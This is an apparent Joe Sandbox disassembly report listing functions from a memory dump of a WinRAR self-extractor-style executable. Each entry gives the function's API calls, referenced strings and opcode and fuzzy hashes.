ReleaseDC.USER32(00000000,00000000), ref: 007CA691

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1843a4bd58ca195c6cd3d7c6b363b1c2a41ac61bcfda61c4d7ffb9800b0e157d
Instruction ID: 86f40fe6d8de57d421f1302905d4b1b5457e118fc054745f8a7f17c5bdaa0146
Opcode Fuzzy Hash: 1843a4bd58ca195c6cd3d7c6b363b1c2a41ac61bcfda61c4d7ffb9800b0e157d
Instruction Fuzzy Hash: DDE0EC31942B21B7D6615B60BC0DBDA3F9CBF09B92F018115FA05A6190DB6886009BA5

Function 007CD06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 007CD11B

Strings

.lnk, xrefs: 007CD2F7, 007CD307
d|, xrefs: 007CD3C5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$d|
API String ID: 2691759472-4241494079
Opcode ID: 0a80c6dcc5dabdd573cc44d7e8c0d1f727060c7686a278ccbb9e45881885dedf
Instruction ID: 80b5f1812f0b24d31c82777889b6b174611f57055266398676f1968e22a81838
Opcode Fuzzy Hash: 0a80c6dcc5dabdd573cc44d7e8c0d1f727060c7686a278ccbb9e45881885dedf
Instruction Fuzzy Hash: 15A1257290022996DF35DBA4CD49FFA73FCAF44304F0885AAB509E7141EE789F858B61

Function 007DB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007DB324

Part of subcall function 007D9097: IsProcessorFeaturePresent.KERNEL32(00000017,007D9086,00000050,007E3A34,?,007BD710,00000004,007F1030,?,?,007D9093,00000000,00000000,00000000,00000000,00000000), ref: 007D9099
Part of subcall function 007D9097: GetCurrentProcess.KERNEL32(C0000417,007E3A34,00000050,007F1030), ref: 007D90BB
Part of subcall function 007D9097: TerminateProcess.KERNEL32(00000000), ref: 007D90C2

Strings

., xrefs: 007DB4DB
*?, xrefs: 007DB1FB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 96b7ff0c27fadea45d47161ab1409490b52e56ebeae60418ea4053c494d89efb
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 89518372E0010AEFDF14DFA8C881AADBBB5FF58314F25416AE955E7340E739AE018B50

Function 007B75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007B75E3

Part of subcall function 007C05DA: _wcslen.LIBCMT ref: 007C05E0

Part of subcall function 007BA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007BA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007B777F

Part of subcall function 007BA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA501
Part of subcall function 007BA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007BA325,?,?,?,007BA175,?,00000001,00000000,?,?), ref: 007BA532

Strings

:, xrefs: 007B7654

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 35d0ff9e89ef583e5c24e54a8895e0656e568e957b0c31b8d35fcb66bf738fb2
Instruction ID: 1ef5e7139d2e10dc9c451eb25db97d6c2b43283e89dc40ab9c1c33822288c7c7
Opcode Fuzzy Hash: 35d0ff9e89ef583e5c24e54a8895e0656e568e957b0c31b8d35fcb66bf738fb2
Instruction Fuzzy Hash: 994140B1801158EAEB35EB64CC59FEEB378AF95300F00409AB709A6092DB785F85CB61

Function 007BB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 007BB438
_wcschr.LIBVCRUNTIME ref: 007BB478

Strings

*, xrefs: 007BB38A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: a9f036b7ba317d901865ef57e385017328f4d6bd65ab73fcc69ee94c10624898
Instruction ID: 00017d31da96c39124e0e5cd40ef336d14d316a065b827969dbfbebd0f89bcb0
Opcode Fuzzy Hash: a9f036b7ba317d901865ef57e385017328f4d6bd65ab73fcc69ee94c10624898
Instruction Fuzzy Hash: BC3126321443819ACB30AE548906BFB73E4FFA5B50F15841EFD8557143E7EE9D829361

Function 007CB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007CB4E3
_wcslen.LIBCMT ref: 007CB4FE

Strings

}, xrefs: 007CB4D6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 3237e88e4f4aa459f17b13605ccfa149623d5e0fb01bc95569e7e19b8ee65e08
Instruction ID: f375c1059924286a54e89d695764bb3316f814ee66cf71614835668a51afee9e
Opcode Fuzzy Hash: 3237e88e4f4aa459f17b13605ccfa149623d5e0fb01bc95569e7e19b8ee65e08
Instruction Fuzzy Hash: C121F6729047469AD731EA64E84AF6BB3ECDF90750F40042EF640C3241EB6CDE5883B2

Function 007CDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,0001048C,007CB270,?,?), ref: 007CDE18

Strings

r|, xrefs: 007CDDDC
GETPASSWORD1, xrefs: 007CDE0D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$r|
API String ID: 665744214-2986932097
Opcode ID: 44bc3ea2060f8009ede07b4fb092b7b1ea867c7c5fcba16724fd19579b3f9573
Instruction ID: 28eb59f115ea4d299589fdc62cafafaaa7b20492fe2553ae8a937b49bc793a28
Opcode Fuzzy Hash: 44bc3ea2060f8009ede07b4fb092b7b1ea867c7c5fcba16724fd19579b3f9573
Instruction Fuzzy Hash: C5110872600188AADB229E349C06FFB3798BB09750F14807DFE45AB180C7BCAD84C764

Function 007BF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 007BF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 007BF2E4
Part of subcall function 007BF2C5: GetProcAddress.KERNEL32(007F81C8,CryptUnprotectMemory), ref: 007BF2F4

GetCurrentProcessId.KERNEL32(?,?,?,007BF33E), ref: 007BF3D2

Strings

CryptUnprotectMemory failed, xrefs: 007BF3CA
CryptProtectMemory failed, xrefs: 007BF389

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 98fc05df0ae7e954d5cf56052129e8c573cdd89697de7897f63681dd35d73bb2
Instruction ID: 8b21f5814c2efdec524b350c99d2ba3ab1f54e3e9000346c2e1d58a7d318750f
Opcode Fuzzy Hash: 98fc05df0ae7e954d5cf56052129e8c573cdd89697de7897f63681dd35d73bb2
Instruction Fuzzy Hash: C411E631601269ABDF159F25DC49BFE3B98FF04F60B04813AFC415B251DA7C9D418795

Function 007C101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,007C1160,?,00000000,00000000), ref: 007C1043
SetThreadPriority.KERNEL32(?,00000000), ref: 007C108A

Part of subcall function 007B6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B6C54

Part of subcall function 007B6DCB: _wcschr.LIBVCRUNTIME ref: 007B6E0A
Part of subcall function 007B6DCB: _wcschr.LIBVCRUNTIME ref: 007B6E19

Strings

CreateThread failed, xrefs: 007C104F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: b3dfa9cf16c3561048da04f79cacfd3ea4e280cb47ba84d72d1c9a7557de7dde
Instruction ID: 23c0722682c6c9e672084ef727b8d53cbf21f7de587d58bee86c32d40b88625a
Opcode Fuzzy Hash: b3dfa9cf16c3561048da04f79cacfd3ea4e280cb47ba84d72d1c9a7557de7dde
Instruction Fuzzy Hash: AB0126B530034DAFD3306F24AC85FB67399EB41350F60003EF78656381CEADA8C48624

Function 007BC058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 007BC080

Strings

?*<>|", xrefs: 007BC06D, 007BC07F
<9~, xrefs: 007BC076

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcschr
String ID: <9~$?*<>|"
API String ID: 2691759472-759207972
Opcode ID: 7463fd93c4e605959a25e05181a8fa2a1b02bdab5cf741771ee652cbc0de7fb8
Instruction ID: f731ad9336f838f454c55bdd0a63aed5704c34f30311f3caa54cfb2c367e19a5
Opcode Fuzzy Hash: 7463fd93c4e605959a25e05181a8fa2a1b02bdab5cf741771ee652cbc0de7fb8
Instruction Fuzzy Hash: 6AF0D113A45302C1C7313B29AC017B2B3E4EFA5320F38882FF4C4872C2E6AD98C09265

Function 007CDB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007CDBAC

Strings

Software\WinRAR SFX, xrefs: 007CDB95
|, xrefs: 007CDB9F

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$|
API String ID: 176396367-3809446200
Opcode ID: 009a8bd56a5806e849577cd0b6b633c016a310f16ca03c30b7775754e43ed16b
Instruction ID: 3408f4a90600de7da3d93944fe33ef5a88499b185ec9ad1c39c60598efe14cd9
Opcode Fuzzy Hash: 009a8bd56a5806e849577cd0b6b633c016a310f16ca03c30b7775754e43ed16b
Instruction Fuzzy Hash: 7B015EB1500158BADB319B55DC09FEB7F7CEF08794F00405AB549A10A1D7A48E88C7A1

Function 007CAE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 007BC29A: _wcslen.LIBCMT ref: 007BC2A2

Part of subcall function 007C1FDD: _wcslen.LIBCMT ref: 007C1FE5
Part of subcall function 007C1FDD: _wcslen.LIBCMT ref: 007C1FF6
Part of subcall function 007C1FDD: _wcslen.LIBCMT ref: 007C2006
Part of subcall function 007C1FDD: _wcslen.LIBCMT ref: 007C2014
Part of subcall function 007C1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007BB371,?,?,00000000,?,?,?), ref: 007C202F

Part of subcall function 007CAC04: SetCurrentDirectoryW.KERNELBASE(?,007CAE72,C:\Users\user\Desktop,00000000,007F946A,00000006), ref: 007CAC08

_wcslen.LIBCMT ref: 007CAE8B

Strings

<|, xrefs: 007CAEC4
C:\Users\user\Desktop, xrefs: 007CAE68

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <|$C:\Users\user\Desktop
API String ID: 521417927-2195105507
Opcode ID: 4af72b684870996c68cc24b2f6c0fe63d90d59e86ac3153e0eb9d02be03f9723
Instruction ID: c234e496d1f142102dd56214a061b456148d799c042157bdab1f4705a7731e07
Opcode Fuzzy Hash: 4af72b684870996c68cc24b2f6c0fe63d90d59e86ac3153e0eb9d02be03f9723
Instruction Fuzzy Hash: 53011EB1D0025DE5DF21ABA49D0AFEF73FCAF08704F00446DF606E3191E6BC96448AA5

Function 007DBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007D97E5: GetLastError.KERNEL32(?,007F1030,007D4674,007F1030,?,?,007D3F73,00000050,?,007F1030,00000200), ref: 007D97E9
Part of subcall function 007D97E5: _free.LIBCMT ref: 007D981C
Part of subcall function 007D97E5: SetLastError.KERNEL32(00000000,?,007F1030,00000200), ref: 007D985D
Part of subcall function 007D97E5: _abort.LIBCMT ref: 007D9863

_abort.LIBCMT ref: 007DBB80
_free.LIBCMT ref: 007DBBB4

Strings

p~, xrefs: 007DBBAB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p~
API String ID: 289325740-2570613599
Opcode ID: 8f2e3526128dea8f77d5626f494bc941efefa67f464dcd57b5653e79fbead191
Instruction ID: 5b7e06c14b2aa0879746b7285f35626f49522ff40b1e58b979068f92c11b281a
Opcode Fuzzy Hash: 8f2e3526128dea8f77d5626f494bc941efefa67f464dcd57b5653e79fbead191
Instruction Fuzzy Hash: B901C4B5D01621DBCB21AF6D844162DBB71BF08720B16055BE82467395CB3D6D018FC9

Function 007CB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 007CB42F

Strings

Z|, xrefs: 007CB441
(|, xrefs: 007CB457

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Malloc
String ID: (|$Z|
API String ID: 2696272793-3331287564
Opcode ID: 1221f3d16cbaf2efcc62c1007fbeeace9efa875acbb397b763bc0056cc161a84
Instruction ID: 167990d0374b5ef15a91187afabe2e9addc90beb760dce51721da1c472d289be
Opcode Fuzzy Hash: 1221f3d16cbaf2efcc62c1007fbeeace9efa875acbb397b763bc0056cc161a84
Instruction Fuzzy Hash: 3F0124B6A00108BF9F059FA0DC49CEEBBADFF08344B004159B906D7120E631AA44DBA0

Function 007C0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,007C1206,?), ref: 007C0FEA
GetLastError.KERNEL32(?), ref: 007C0FF6

Part of subcall function 007B6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007C0FFF

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: f7cb2b4066fd332f6337fcd9322a220461a85a9d009e1a531e59579ad4178dbf
Instruction ID: e0d83f7b64b7d887a6671f755456a765ca93bcd8495bfe7e93b74aae7cbd4284
Opcode Fuzzy Hash: f7cb2b4066fd332f6337fcd9322a220461a85a9d009e1a531e59579ad4178dbf
Instruction Fuzzy Hash: 1ED02B71505164B6C61033255C0DEBE3D058B16331FA04728F238692E2CE2C098146A5

Function 007BE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,007BDA55,?), ref: 007BE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,007BDA55,?), ref: 007BE2B1

Strings

RTL, xrefs: 007BE2AB

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: bea44e8e1e064b0a0d6fe0fef294ddeeebed66dd999a630cf60380a9e3b985b9
Instruction ID: 88af63d2c7c8c3dd52eaab9a617ce782257c8dc4925aadbbaca095d68319148c
Opcode Fuzzy Hash: bea44e8e1e064b0a0d6fe0fef294ddeeebed66dd999a630cf60380a9e3b985b9
Instruction Fuzzy Hash: 7BC08C71242B9066EB3067757C8DFC36E59AB08B21F09445CB281EF2D1DAEDC980C7E0

Function 007CE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE467

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

p|, xrefs: 007CE461
z|, xrefs: 007CE47A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
